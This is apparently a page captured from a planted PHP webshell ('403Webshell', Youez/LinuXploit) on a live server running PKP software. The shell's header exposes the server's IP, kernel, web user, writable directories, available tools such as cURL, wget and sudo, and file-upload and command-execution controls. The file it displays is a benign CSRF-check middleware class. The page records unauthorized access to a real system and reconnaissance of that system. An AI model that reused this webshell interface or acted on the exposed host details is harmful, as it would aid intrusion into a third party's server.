403Webshell
Server IP : 195.134.90.114  /  Your IP : 216.73.216.86
Web Server : Apache/2.4.58
System : Linux nepub 6.8.0-88-generic #89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : OFF
Directory :  /var/www/html/public_html/lib/pkp/classes/security/authorization/internal/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /var/www/html/public_html/lib/pkp/classes/security/authorization/internal/ApiCsrfMiddleware.inc.php
<?php

/**
 * @file classes/security/authorization/internal/ApiCsrfMiddleware.inc.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2000-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @class ApiCsrfMiddleware
 * @ingroup security_authorization
 *
 * @brief Slim middleware which requires a CSRF token for POST, PUT and DELETE
 *  operations whenever an API Token is not in use.
 */

class ApiCsrfMiddleware {

	/** @var APIHandler $handler Reference to api handler */
	protected $_handler = null;

	/**
	 * Constructor
	 *
	 * @param APIHandler $handler
	 */
	public function __construct(APIHandler $handler) {
		$this->_handler = $handler;
	}

	/**
	 * Middleware invokable function
	 *
	 * @param SlimRequest $slimRequest request
	 * @param SlimResponse $response response
	 * @param callable $next Next middleware
	 * @return SlimResponse
	 */
	public function __invoke($slimRequest, $response, $next) {
		if ($this->_isCSRFRequired($slimRequest) && !$this->_isCSRFValid($slimRequest)) {
			return $response->withJson([
				'error' => 'form.csrfInvalid',
				'errorMessage' => __('form.csrfInvalid'),
			], 403);
		}
		$response = $next($slimRequest, $response);
		return $response;
	}

	/**
	 * Check if a CSRF token is required
	 *
	 * @param SlimRequest $slimRequest
	 * @return boolean
	 */
	protected function _isCSRFRequired($slimRequest) {
		if ($this->_handler->getApiToken()) {
			return false;
		}
		$server = $slimRequest->getServerParams();
		return !empty($server['REQUEST_METHOD']) && in_array($server['REQUEST_METHOD'], ['POST', 'PUT', 'DELETE']);
	}

	/**
	 * Check if the CSRF token is present and valid
	 *
	 * @param SlimRequest $slimRequest
	 * @return boolean
	 */
	protected function _isCSRFValid($slimRequest) {
		$server = $slimRequest->getServerParams();
		if (empty($server['HTTP_X_CSRF_TOKEN'])) {
			return false;
		}
		$session = Application::get()->getRequest()->getSession();
		return $session && $session->getCSRFToken() === $server['HTTP_X_CSRF_TOKEN'];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit